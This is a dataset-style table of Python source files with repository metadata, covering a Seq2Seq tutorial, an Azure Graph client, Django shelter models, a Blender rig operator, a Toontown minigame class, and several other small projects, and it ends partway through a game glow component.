blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ce2b7d07311d2c3f5b17ab13e8c2c369c6c13a21 | 035e51eadfb4c391a380d4985f2b82716d5dade9 | /4-1.Seq2Seq/Seq2Seq.py | 874048450ccc3eeada3df47afbd7322a4d31e0be | [
"MIT"
] | permissive | bage79/nlp-tutorial | fa07336c6d0d4f28e5036fdf857702633912405b | 801305b9f6d62daa652a3c335009959f0f3d752f | refs/heads/master | 2021-07-05T19:23:39.933479 | 2020-12-11T11:12:26 | 2020-12-11T11:12:26 | 210,335,384 | 3 | 0 | MIT | 2019-09-23T11:13:58 | 2019-09-23T11:13:57 | null | UTF-8 | Python | false | false | 4,312 | py | # %%
# code by Tae Hwan Jung @graykode
import argparse
import numpy as np
import torch
import torch.nn as nn
# S: Symbol that shows starting of decoding input
# E: Symbol that shows starting of decoding output
# P: Symbol that will fill in blank sequence if current batch data size is short than time steps
def make_batch():
input_batch, output_batch, target_batch = [], [], []
for seq in seq_data:
for i in range(2):
seq[i] = seq[i] + 'P' * (n_step - len(seq[i]))
input = [num_dic[n] for n in seq[0]]
output = [num_dic[n] for n in ('S' + seq[1])]
target = [num_dic[n] for n in (seq[1] + 'E')]
input_batch.append(np.eye(n_class)[input])
output_batch.append(np.eye(n_class)[output])
target_batch.append(target) # not one-hot
# make tensor
return torch.FloatTensor(input_batch), torch.FloatTensor(output_batch), torch.LongTensor(target_batch)
# Model
class Seq2Seq(nn.Module):
def __init__(self):
super(Seq2Seq, self).__init__()
self.enc_cell = nn.RNN(input_size=n_class, hidden_size=n_hidden, dropout=0.5)
self.dec_cell = nn.RNN(input_size=n_class, hidden_size=n_hidden, dropout=0.5)
self.fc = nn.Linear(n_hidden, n_class)
def forward(self, enc_input, enc_hidden, dec_input):
enc_input = enc_input.transpose(0, 1) # enc_input: [max_len(=n_step, time step), batch_size, n_class]
dec_input = dec_input.transpose(0, 1) # dec_input: [max_len(=n_step, time step), batch_size, n_class]
# enc_states : [num_layers(=1) * num_directions(=1), batch_size, n_hidden]
_, enc_states = self.enc_cell(enc_input, enc_hidden)
# outputs : [max_len+1(=6), batch_size, num_directions(=1) * n_hidden(=128)]
outputs, _ = self.dec_cell(dec_input, enc_states)
model = self.fc(outputs) # model : [max_len+1(=6), batch_size, n_class]
return model
if __name__ == '__main__':
n_step = 5
n_hidden = 128
char_arr = [c for c in 'SEPabcdefghijklmnopqrstuvwxyz']
num_dic = {n: i for i, n in enumerate(char_arr)}
seq_data = [['man', 'women'], ['black', 'white'], ['king', 'queen'], ['girl', 'boy'], ['up', 'down'], ['high', 'low']]
n_class = len(num_dic)
batch_size = len(seq_data)
model = Seq2Seq()
criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(model.parameters(), lr=0.001)
input_batch, output_batch, target_batch = make_batch()
for epoch in range(5000):
# make hidden shape [num_layers * num_directions, batch_size, n_hidden]
hidden = torch.zeros(1, batch_size, n_hidden)
optimizer.zero_grad()
# input_batch : [batch_size, max_len(=n_step, time step), n_class]
# output_batch : [batch_size, max_len+1(=n_step, time step) (becase of 'S' or 'E'), n_class]
# target_batch : [batch_size, max_len+1(=n_step, time step)], not one-hot
output = model(input_batch, hidden, output_batch)
# output : [max_len+1, batch_size, n_class]
output = output.transpose(0, 1) # [batch_size, max_len+1(=6), n_class]
loss = 0
for i in range(0, len(target_batch)):
# output[i] : [max_len+1, n_class, target_batch[i] : max_len+1]
loss += criterion(output[i], target_batch[i])
if (epoch + 1) % 1000 == 0:
print('Epoch:', '%04d' % (epoch + 1), 'cost =', '{:.6f}'.format(loss))
loss.backward()
optimizer.step()
# Test
def translate(word, args):
input_batch, output_batch, _ = make_batch([[word, 'P' * len(word)]], args)
# make hidden shape [num_layers * num_directions, batch_size, n_hidden]
hidden = torch.zeros(1, 1, args.n_hidden)
output = model(input_batch, hidden, output_batch)
# output : [max_len+1(=6), batch_size(=1), n_class]
predict = output.data.max(2, keepdim=True)[1] # select n_class dimension
decoded = [char_arr[i] for i in predict]
end = decoded.index('E')
translated = ''.join(decoded[:end])
return translated.replace('P', '')
print('test')
print('man ->', translate('man'))
print('mans ->', translate('mans'))
print('king ->', translate('king'))
print('black ->', translate('black'))
print('upp ->', translate('upp')) | [
"nlkey2022@gmail.com"
] | nlkey2022@gmail.com |
d82aacb1766a56a6ec366a413244151cecbedd3f | 6364bb727b623f06f6998941299c49e7fcb1d437 | /msgraph-cli-extensions/src/reports/azext_reports/vendored_sdks/reports/aio/_reports_async.py | 1d9d705411e28f9c5eacf93474eb657f3973b795 | [
"MIT"
] | permissive | kanakanaidu/msgraph-cli | 1d6cd640f4e10f4bdf476d44d12a7c48987b1a97 | b3b87f40148fb691a4c331f523ca91f8a5cc9224 | refs/heads/main | 2022-12-25T08:08:26.716914 | 2020-09-23T14:29:13 | 2020-09-23T14:29:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,260 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Optional, TYPE_CHECKING
from azure.mgmt.core import AsyncARMPipelineClient
from msrest import Deserializer, Serializer
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials_async import AsyncTokenCredential
from ._configuration_async import ReportsConfiguration
from .operations_async import ReportReportRootOperations
from .operations_async import ReportOperations
from .. import models
class Reports(object):
"""Reports.
:ivar report_report_root: ReportReportRootOperations operations
:vartype report_report_root: reports.aio.operations_async.ReportReportRootOperations
:ivar report: ReportOperations operations
:vartype report: reports.aio.operations_async.ReportOperations
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials_async.AsyncTokenCredential
:param top: Show only the first n items.
:type top: int
:param skip: Skip the first n items.
:type skip: int
:param search: Search items by search phrases.
:type search: str
:param filter: Filter items by property values.
:type filter: str
:param count: Include count of items.
:type count: bool
:param str base_url: Service URL
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
"""
def __init__(
self,
credential: "AsyncTokenCredential",
top: Optional[int] = None,
skip: Optional[int] = None,
search: Optional[str] = None,
filter: Optional[str] = None,
count: Optional[bool] = None,
base_url: Optional[str] = None,
**kwargs: Any
) -> None:
if not base_url:
base_url = 'https://graph.microsoft.com/beta'
self._config = ReportsConfiguration(credential, top, skip, search, filter, count, **kwargs)
self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
self.report_report_root = ReportReportRootOperations(
self._client, self._config, self._serialize, self._deserialize)
self.report = ReportOperations(
self._client, self._config, self._serialize, self._deserialize)
async def close(self) -> None:
await self._client.close()
async def __aenter__(self) -> "Reports":
await self._client.__aenter__()
return self
async def __aexit__(self, *exc_details) -> None:
await self._client.__aexit__(*exc_details)
| [
"japhethobalak@gmail.com"
] | japhethobalak@gmail.com |
2148a1ec86f693f6250a590af5dd963cab9d67ae | eb4dd92bb28d60b9e967dcf4d3b380a29169774f | /MDRSREID/Settings/parser_args/parser_args.py | 1c60704bbc187c0850cc4ab93193e9a881c82bf0 | [] | no_license | qianqiansbaby/HJL-re-id | b972c441e780fdb83c176405bc644be4a7d48779 | 337de9e06fc43de1388fd719c5dea9d2d71f0df6 | refs/heads/master | 2023-01-10T13:45:02.502919 | 2020-10-15T12:09:52 | 2020-10-15T12:09:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,780 | py | import argparse
def parser_args():
"""
:argument:
--exp_dir
--default_config_path
--ow_config_path
--ow_str
:return:
"""
parser = argparse.ArgumentParser()
parser.add_argument('--model_name',
type=str,
default='MDRS',
help='[Optional] Model Name for experiment directory in current directory if exp_dir is None')
parser.add_argument('--exp_dir',
type=str,
default='D:/weights_results/HJL-ReID/MDRS_ADAM_random_erasing_margin_0.3_market_best', # 'D:/weights_results/HOReID/pre-trained', #
help='[Optional] Directory to store experiment output, '
'including log files and model checkpoint, etc.')
parser.add_argument('--default_config_path',
type=str,
default='D:/Pycharm_Project/HJL-ReID/MDRSREID/Settings/config/default_config.py',
help='A configuration file.')
parser.add_argument('--ow_config_path',
type=str,
default='D:/Pycharm_Project/HJL-ReID/MDRSREID/Settings/config/overwrite_config/MDRS_config_ADAM_best_market1501.txt',
help='[Optional] A text file, each line being an item to overwrite the cfg_file.')
parser.add_argument('--ow_str',
type=str,
default='cfg.dataset.train.name = \'market1501\'',
help="""[Optional] Items to overwrite the cfg_file.
E.g. "cfg.dataset.train.name = \'market1501\''; cfg.model.em_dim = 256" """)
args, _ = parser.parse_known_args()
return args
| [
"nickhuang1996@126.com"
] | nickhuang1996@126.com |
3cda84b7006d285ed9ce4c722c48031cff326c35 | 31dfdbde18ea2844895e453e5ee4a854d1ec35e9 | /onlinejudge/_implementation/command/split_input.py | c89385542db4cdc82cf728a6486c97e278548a9c | [
"MIT"
] | permissive | uta8a/online-judge-tools | 1d848f91749c4661c71ec527b18ac79a0b1ca419 | d9f1209c4e986a881181476c039f5051cd42d75d | refs/heads/master | 2020-04-27T07:43:16.882820 | 2019-03-04T13:17:35 | 2019-03-04T13:17:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,025 | py | # Python Version: 3.x
import subprocess
import sys
import time
from typing import *
from typing.io import *
import onlinejudge
import onlinejudge._implementation.logging as log
import onlinejudge._implementation.utils as utils
if TYPE_CHECKING:
import argparse
def non_block_read(fh: IO[Any]) -> str:
# workaround
import fcntl
import os
fd = fh.fileno()
fl = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
try:
return fh.read()
except:
return ''
split_input_auto_footer = ('__AUTO_FOOTER__', ) # this shouldn't be a string, so a tuple
def split_input(args: 'argparse.Namespace') -> None:
with open(args.input) as fh:
inf = fh.read()
if args.footer == split_input_auto_footer:
args.footer = inf.splitlines(keepends=True)[-1]
with subprocess.Popen(args.command, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=sys.stderr) as proc:
index = 0
acc = ''
for line in inf.splitlines(keepends=True):
if args.ignore:
args.ignore -= 1
else:
acc += line
proc.stdin.write(line.encode())
proc.stdin.flush()
time.sleep(args.time)
if non_block_read(proc.stdout): # if output exists
index += 1
path = utils.percentformat(args.output, {'i': str(index)})
log.info('case found: %d', index)
if args.header:
if args.header == args.header.strip():
acc = '\n' + acc
acc = args.header + acc
if args.footer:
acc = acc + args.footer
log.emit(log.bold(acc))
with open(path, 'w') as fh:
fh.write(acc)
log.success('saved to: %s', path)
acc = ''
while non_block_read(proc.stdout): # consume all
pass
| [
"kimiyuki95@gmail.com"
] | kimiyuki95@gmail.com |
de13c219187366afe4cc847fe551db4d7c1b2c32 | 505343f6ace00d22f8753c1a943a5794a619e698 | /katas/Python/6 kyu/Consecutive strings 56a5d994ac971f1ac500003e.py | 1a7200b1a4cf9cbb3c6987b8b4f5039a7fc9099c | [] | no_license | bullet1337/codewars | 7652e50bf768bc47976a9124dd98b93602d4d458 | ba7f13ddd766158b41e036dae5d6b15f7f08761a | refs/heads/master | 2020-03-27T05:04:03.751302 | 2019-04-30T17:45:39 | 2019-04-30T17:45:39 | 145,991,995 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 349 | py | # https://www.codewars.com/kata/56a5d994ac971f1ac500003e
def longest_consec(strarr, k):
if len(strarr) == 0 or not(0 < k <= len(strarr)):
return ''
res = ''.join(strarr[:k])
for i in range(1, len(strarr) - k + 1):
x = ''.join(strarr[i:i + k])
if len(x) > len(res):
res = x
return res
| [
"alichek95@mail.ru"
] | alichek95@mail.ru |
a4f3c184786b0f88401bb53010992e6b905798c5 | 5cf71ff8714bf0568394717c6176f371f929555d | /mizql/evacuation/models.py | e0176faf3d9cd45055e5c14d034afab27c9b873e | [
"MIT"
] | permissive | StudioAquatan/mizql | 66a9b1a8117dcb1f8dd86c94bb8632e076eb7996 | 340e44266a97dda846fbc17ce0edf85cee586f51 | refs/heads/master | 2020-04-04T13:12:54.361363 | 2018-11-11T06:20:15 | 2018-11-11T06:20:15 | 155,953,069 | 0 | 0 | MIT | 2020-03-15T09:21:09 | 2018-11-03T05:23:07 | JavaScript | UTF-8 | Python | false | false | 4,607 | py | from django.db import models
from django.contrib.auth import get_user_model
from django.db.models.expressions import RawSQL
from django.utils import timezone
class NearbyShelterManager(models.Manager):
def with_distance(self, lat: float, lon: float):
"""
Shelterクエリセットに対してdistanceカラムを追加する
:param lat:
:param lon:
:return:
"""
raw_queryset = self.get_queryset()
# 距離を計算するクエリ
query = """
6371 * acos(
cos(radians(%s)) * cos(radians(lat)) * cos(radians(lon) - radians(%s))
+ sin(radians(%s)) * sin(radians(lat))
)
"""
# 計算したdistanceフィールドをannotate
queryset = raw_queryset.annotate(distance=RawSQL(query, (lat, lon, lat)))
return queryset
def get_nearby_shelters_list(self, lat: float, lon: float, distance: int):
"""
自身の緯度経度から範囲を指定して避難所の情報一覧を取得する
:param lat: 自身の緯度
:param lon: 自身の経度
:param distance: 取得する半径(メートル)
:return: queryset
"""
queryset = self.with_distance(lat, lon)
# キロメートルに変換
distance = distance / 1000
# distanceの内容でフィルタ
return queryset.filter(distance__lte=distance)
class Shelter(models.Model):
"""
避難所のモデル
"""
name = models.CharField(verbose_name='名前', max_length=255)
address = models.CharField(verbose_name='住所', max_length=255)
lat = models.FloatField(verbose_name='緯度')
lon = models.FloatField(verbose_name='経度')
capacity = models.IntegerField('収容可能人数', null=True)
objects = NearbyShelterManager()
class Meta:
unique_together = ('lat', 'lon')
ordering = ['name']
def __str__(self):
return self.name
class PersonalEvacuationHistory(models.Model):
"""
個人の避難履歴を取る
"""
user = models.ForeignKey(get_user_model(), verbose_name='ユーザ', on_delete=models.CASCADE,
related_name='evacuation_histories')
shelter = models.ForeignKey(Shelter, verbose_name='避難所', on_delete=models.CASCADE,
related_name='personal_histories')
created_at = models.DateTimeField('日付')
is_evacuated = models.BooleanField(verbose_name='避難しているか')
class Meta:
ordering = ['-created_at']
class EvacuationHistoryManager(models.Manager):
def create(self, shelter: Shelter, now=None):
"""
10分前から現在までの避難人数を取得
:param shelter:
:param now: 時刻
:return:
"""
if now is None:
now = timezone.now()
latest_date = now
latest_count = 0
# 最新の履歴から人数を取得
personal_histories = PersonalEvacuationHistory.objects.filter(shelter=shelter)
latest_history = EvacuationHistory.objects.filter(shelter=shelter).order_by('-created_at').first()
if latest_history is not None:
latest_count = latest_history.count
latest_date = latest_history.created_at
else:
last_history = personal_histories.order_by('-created_at').first()
if last_history is not None:
latest_date = last_history.created_at
# 前回取得時意向の履歴一覧
personal_histories = personal_histories.filter(created_at__range=[latest_date, now])
# 避難した人数
at_shelter_count = personal_histories.filter(is_evacuated=True).count()
# 帰宅した人数
at_home_count = personal_histories.filter(is_evacuated=False).count()
# 現在避難所に居る人数
current_count = latest_count + at_shelter_count - at_home_count
hist = self.model(shelter=shelter, count=current_count, created_at=now)
hist.save()
return hist
class EvacuationHistory(models.Model):
"""
避難人数の履歴を取る
"""
shelter = models.ForeignKey(Shelter, verbose_name='避難所', related_name='histories', on_delete=models.CASCADE)
count = models.IntegerField('避難している人数')
is_demo = models.BooleanField('デモ用', default=True)
created_at = models.DateTimeField('取得日')
objects = EvacuationHistoryManager()
class Meta:
ordering = ['-created_at']
| [
"s.kokuryo@gmail.com"
] | s.kokuryo@gmail.com |
4b4f8b16ed3a3451ce853106c6e8934456e04fb6 | 13c2639490aa8cc3ecf891ae3422f0e105dd886e | /order/migrations/0002_auto_20210317_0002.py | f7c72217f08e89a7ab5b6c86813708d6998f5039 | [] | no_license | maratovision/rest_api | d32fdfc8d5d8968d2c8ef77aaed05b25d6fa26a0 | b734f3cf1c626f4043dbaa0fa7a6f41ebf9cdcae | refs/heads/main | 2023-04-08T12:54:40.736337 | 2021-04-08T20:24:15 | 2021-04-08T20:24:15 | 356,038,311 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 877 | py | # Generated by Django 3.1.7 on 2021-03-16 18:02
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('order', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Table',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('area', models.CharField(max_length=10)),
('status', models.CharField(choices=[('Reserved', 'Reserved'), ('Empty', 'Empty')], default='Empty', max_length=20)),
],
),
migrations.AlterField(
model_name='order',
name='table',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='order.table'),
),
]
| [
"maratovision@gmail.com"
] | maratovision@gmail.com |
aa8ca750eff2dc9bc48404571caa906b5e430e8d | ca259c70bd7e565fa45cf7e9597251e7bbd8f240 | /menus/Lighting/ImportRig.py | 8d7f775e12661b27003fe7a168840d311f8ef2ba | [] | no_license | gmolinart/blender_pipeline | 6ecd01e8efa02a2b9b8f68ece3e82a35d899c73c | 1a01d78a697c3fc70e6410b46b5138405d4b542c | refs/heads/master | 2023-04-10T04:17:44.349286 | 2021-04-20T11:14:26 | 2021-04-20T11:14:26 | 304,119,928 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,490 | py | import bpy
# from cgl.plugins.blender import Alchemy as lm
class ImportRig(bpy.types.Operator):
"""
This class is required to register a button in blender.
"""
bl_idname = 'object.import_rig'
bl_label = 'Import Rig'
@classmethod
def poll(cls, context):
return context.active_object is not None
def execute(self, context):
run()
return {'FINISHED'}
import bpy
def import_selected_rig():
rig = bpy.context.object
if 'proxy' in rig.name:
object_name = rig.name.replace('_proxy', '')
elif 'rig' in rig.name:
object_name = rig.name.replace('_rig', '')
object = bpy.data.objects[object_name]
action = rig.animation_data
if not action:
print('NO ANIMATION')
object.animation_data_create()
return
else:
action = rig.animation_data.action.name
rig.select_set(False)
object.select_set(True)
bpy.ops.object.duplicates_make_real()
imported_rig_name = '{}_rig'.format(object_name)
return (imported_rig_name, action)
def link_animation(object, action):
imported_rig = bpy.data.objects[object]
action = bpy.data.actions[action]
imported_rig.animation_data_create()
imported_rig.animation_data.action = action
def run():
object, action = import_selected_rig()
print(object, action)
link_animation(object, action)
link_animation(object, action)
# link_animation('MILVIO_rig', 'MILVIO_proxyAction') | [
"gmolinart@gmail.com"
] | gmolinart@gmail.com |
7daec122740e4dd33b266b8e1ae3a1bb2cf663de | a857d1911a118b8aa62ffeaa8f154c8325cdc939 | /toontown/minigame/DivingTreasure.py | fbb219a4caf3e31d142fc374c0c2f6bb0918ff6b | [
"MIT"
] | permissive | DioExtreme/TT-CL-Edition | 761d3463c829ec51f6bd2818a28b667c670c44b6 | 6b85ca8352a57e11f89337e1c381754d45af02ea | refs/heads/main | 2023-06-01T16:37:49.924935 | 2021-06-24T02:25:22 | 2021-06-24T02:25:22 | 379,310,849 | 0 | 0 | MIT | 2021-06-22T15:07:31 | 2021-06-22T15:07:30 | null | UTF-8 | Python | false | false | 1,336 | py | from direct.showbase.DirectObject import DirectObject
from toontown.toonbase.ToontownGlobals import *
from direct.directnotify import DirectNotifyGlobal
from direct.interval.IntervalGlobal import *
import DivingGameGlobals
class DivingTreasure(DirectObject):
def __init__(self, i):
self.treasureNode = render.attachNewNode('treasure')
loadBase = 'phase_4/models/minigames/'
self.chest = loader.loadModel(loadBase + 'treasure.bam')
self.chest.reparentTo(self.treasureNode)
self.chest.setPos(0, 0, -25)
self.chest.setScale(1, 0.7, 1)
self.chestId = i
self.grabbedId = 0
self.moveLerp = Sequence()
self.treasureNode.setScale(0.04)
self.treasureNode.setPos(-15 + 10.0 * i, 0.25, -36.0)
cSphere = CollisionSphere(0.0, 0.0, 0.0, 45)
cSphere.setTangible(0)
name = str(i)
cSphereNode = CollisionNode(name)
cSphereNode.setIntoCollideMask(DivingGameGlobals.CollideMask)
cSphereNode.addSolid(cSphere)
self.chestNode = cSphereNode
self.chestCNP = self.treasureNode.attachNewNode(cSphereNode)
def destroy(self):
self.ignoreAll()
del self.chest
self.moveLerp.finish()
del self.moveLerp
self.treasureNode.removeNode()
del self.treasureNode
| [
"devinhall4@gmail.com"
] | devinhall4@gmail.com |
7fb4bde6fd28390cdae70c8247ed6a32b2200435 | a4da4b0bee0a6ff500283964f506b578de3701c6 | /mva/scripts/dnn_resweights.py | 0a023e653d56d116acf1b45904cba9b5fafd4fea | [] | no_license | kondratyevd/H2MuPurdue | 4ac012562c02acad6751a1e1ecb6fa1c46d832f5 | 2c0632ecf083840743ee6d652bb31e4ddde101e2 | refs/heads/master | 2020-05-14T19:16:46.489982 | 2019-08-25T21:03:17 | 2019-08-25T21:03:17 | 181,926,372 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,051 | py | import os, sys
sys.path.append( os.path.dirname( os.path.dirname( os.path.abspath(__file__) ) ) )
import argparse
from classifier import Framework
from samples.ntuples import *
parser = argparse.ArgumentParser(description='')
parser.add_argument('--out_path', action='store', dest='output_path', help='Output path')
args = parser.parse_args()
c = Framework(outPath=args.output_path)
c.label = "dnn_resweights"
comment = "DNN UCSD resweights"
# change this line for each run
c.add_comment(comment)
print comment
treePath = 'tree'
c.set_tree_path(treePath)
c.set_year("ucsd_inclusive")
c.massWindow = [120,130]
c.multiclass = True
c.dy_label = "DY"
c.top_label = "ttbar"
c.ggh_label = "ggH"
c.vbf_label = "VBF"
##################### Input samples #######################
c.add_category(c.ggh_label, True)
c.add_file_to_category(ucsd_ggh_2016.name, ucsd_ggh_2016.path, ucsd_ggh_2016.xSec, c.ggh_label, False)
c.add_file_to_category(ucsd_ggh_2017.name, ucsd_ggh_2017.path, ucsd_ggh_2017.xSec, c.ggh_label, False)
c.add_file_to_category(ucsd_ggh_2018.name, ucsd_ggh_2018.path, ucsd_ggh_2018.xSec, c.ggh_label, False)
c.add_category(c.vbf_label, True)
c.add_file_to_category(ucsd_vbf_2016.name, ucsd_vbf_2016.path, ucsd_vbf_2016.xSec, c.vbf_label, False)
c.add_file_to_category(ucsd_vbf_2017.name, ucsd_vbf_2017.path, ucsd_vbf_2017.xSec, c.vbf_label, False)
c.add_file_to_category(ucsd_vbf_2018.name, ucsd_vbf_2018.path, ucsd_vbf_2018.xSec, c.vbf_label, False)
c.add_category(c.dy_label, False)
c.add_file_to_category(ucsd_dy_2016.name, ucsd_dy_2016.path, ucsd_dy_2016.xSec, c.dy_label, False)
c.add_file_to_category(ucsd_dy_2017.name, ucsd_dy_2017.path, ucsd_dy_2017.xSec, c.dy_label, False)
c.add_file_to_category(ucsd_dy_2018.name, ucsd_dy_2018.path, ucsd_dy_2018.xSec, c.dy_label, False)
c.add_category(c.top_label, False)
c.add_file_to_category(ucsd_top_2016.name, ucsd_top_2016.path, ucsd_top_2016.xSec, c.top_label, False)
c.add_file_to_category(ucsd_top_2017.name, ucsd_top_2017.path, ucsd_top_2017.xSec, c.top_label, False)
c.add_file_to_category(ucsd_top_2018.name, ucsd_top_2018.path, ucsd_top_2018.xSec, c.top_label, False)
##########################################################
### ------ Raffaele's variables ------ ###
c.add_variable("hmmpt")
c.add_variable("hmmrap")
c.add_variable("hmmthetacs")
c.add_variable("hmmphics")
c.add_variable("met")
c.add_variable("m1ptOverMass")
c.add_variable("m2ptOverMass")
c.add_variable('m1eta')
c.add_variable('m2eta')
c.add_variable("njets")
c.add_variable("nbjets")
c.add_variable("zepen")
c.add_variable("j1pt")
c.add_variable("j2pt")
c.add_variable("j1eta")
c.add_variable("mjj")
c.add_variable("detajj")
c.add_variable("dphijj")
###############################################
c.add_spectator('hmass')
c.add_spectator('hmerr')
c.add_spectator('weight')
c.weigh_by_event(True)
c.add_package("Keras")
c.add_method("model_resweights") # Dropout 0.2
c.train_methods()
print "Training is done: "
print comment
print "Output saved to:"
print c.outPath
| [
"kondratyev.d.95@gmail.com"
] | kondratyev.d.95@gmail.com |
df5831a71a391f87980328438fe5f86926e0ab15 | 878eecba2d3c6be9df9df0e3d1efb305eb2d7bf5 | /manage.py | 8fe753e6b0606bce8e97835f42364119c428cc9e | [] | no_license | tarunkarmakardev/ModernTools-landing-page | dfa7e3beb162a774495d3483754861ba656a5d50 | ddc811fcb6dcf63ec81d065da2a4e041b94868c0 | refs/heads/master | 2023-01-27T16:02:24.272707 | 2020-12-16T05:18:18 | 2020-12-16T05:18:18 | 321,691,506 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 672 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'moderntools_proj.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"tarun.karmakar.dev@gmail.com"
] | tarun.karmakar.dev@gmail.com |
34a44453130cb2d95cedae4a983ee5c515790b86 | ad13583673551857615498b9605d9dcab63bb2c3 | /output/instances/nistData/list/positiveInteger/Schema+Instance/NISTXML-SV-IV-list-positiveInteger-minLength-1-2.py | 715b946fa5159fb0b19af0b0861cf6fa438d9072 | [
"MIT"
] | permissive | tefra/xsdata-w3c-tests | 397180205a735b06170aa188f1f39451d2089815 | 081d0908382a0e0b29c8ee9caca6f1c0e36dd6db | refs/heads/main | 2023-08-03T04:25:37.841917 | 2023-07-29T17:10:13 | 2023-07-30T12:11:13 | 239,622,251 | 2 | 0 | MIT | 2023-07-25T14:19:04 | 2020-02-10T21:59:47 | Python | UTF-8 | Python | false | false | 527 | py | from output.models.nist_data.list_pkg.positive_integer.schema_instance.nistschema_sv_iv_list_positive_integer_min_length_1_xsd.nistschema_sv_iv_list_positive_integer_min_length_1 import NistschemaSvIvListPositiveIntegerMinLength1
obj = NistschemaSvIvListPositiveIntegerMinLength1(
value=[
955456363348331457,
957542655657275468,
957263866322362775,
921363534435668136,
976427824647526163,
941574587237452877,
976854472611424354,
956756856825653725,
]
)
| [
"tsoulloftas@gmail.com"
] | tsoulloftas@gmail.com |
1c9a374e93179c7fbd847ad7da7bc482836d3182 | 08e2ed7fb3a3080c8cdc46cf7e4cbb2a6e60f90a | /src/game_object/components/glow_component.py | c9dcce079c5157b55879ec2957c6c94e19314bc1 | [] | no_license | thydungeonsean/_rainbowmancer | 1630b60983719dde77cd1dea267dd15dde855c38 | cebaf66f5c69f60f8b6c38492f19b8f1e32f73fe | refs/heads/master | 2021-04-28T07:35:06.183408 | 2018-03-19T19:55:47 | 2018-03-19T19:55:47 | 122,226,506 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,819 | py | from game_object_component import GameObjectComponent
from src.enum.hues import *
class GlowComponent(GameObjectComponent):
CYCLE = 24
HALF_CYCLE = CYCLE / 2
def __init__(self, owner, color):
GameObjectComponent.__init__(self, owner)
self.color_component = color
self.pol = 1
self.tick = 0
def run(self):
self.tick += 1
if self.tick >= GlowComponent.CYCLE:
self.tick = 0
self.pol = 1
elif self.tick == GlowComponent.HALF_CYCLE:
self.pol = -1
if self.is_boosted or self.is_vulnerable or self.owner.critical:
self.color_component.request_update()
@property
def color_map(self):
return self.owner.level_map.color_map
@property
def is_boosted(self):
return self.matches_tile_color()
@property
def is_vulnerable(self):
return self.is_opposed_to_tile_color()
@property
def pos(self):
return self.owner.coord.int_position
def matches_tile_color(self):
if self.color_component.hue_id != WHITE_HUE:
return self.color_map.get_tile(self.pos) == self.color_component.hue_id
else:
return False
def is_opposed_to_tile_color(self):
tile_hue = self.color_map.get_tile(self.pos)
object_hue = self.color_component.hue_id
return tile_hue in opposed_hues[object_hue]
def get_critical_flash(self):
if self.color_component.is_generated:
bot = LT_BLACK
top = hue_table[self.color_component.hue_id][max_str]
elif self.color_map.get_tile(self.pos) not in {WHITE_HUE, DARK_HUE}:
bot = LT_BLACK
top = hue_table[self.color_map.get_tile(self.pos)][max_str]
else:
bot = PURE_BLACK
top = GREY_3
return self.interpolate_colors(bot, top, self.get_progress_percentage())
def get_boost_flash(self):
if self.color_component.hue_id in strong_colors:
bot = hue_table[self.color_component.hue_id][max_str]
else:
bot = hue_table[self.color_component.hue_id][3]
top = WHITE
return self.interpolate_colors(bot, top, self.get_progress_percentage())
def get_progress_percentage(self):
if self.pol == 1:
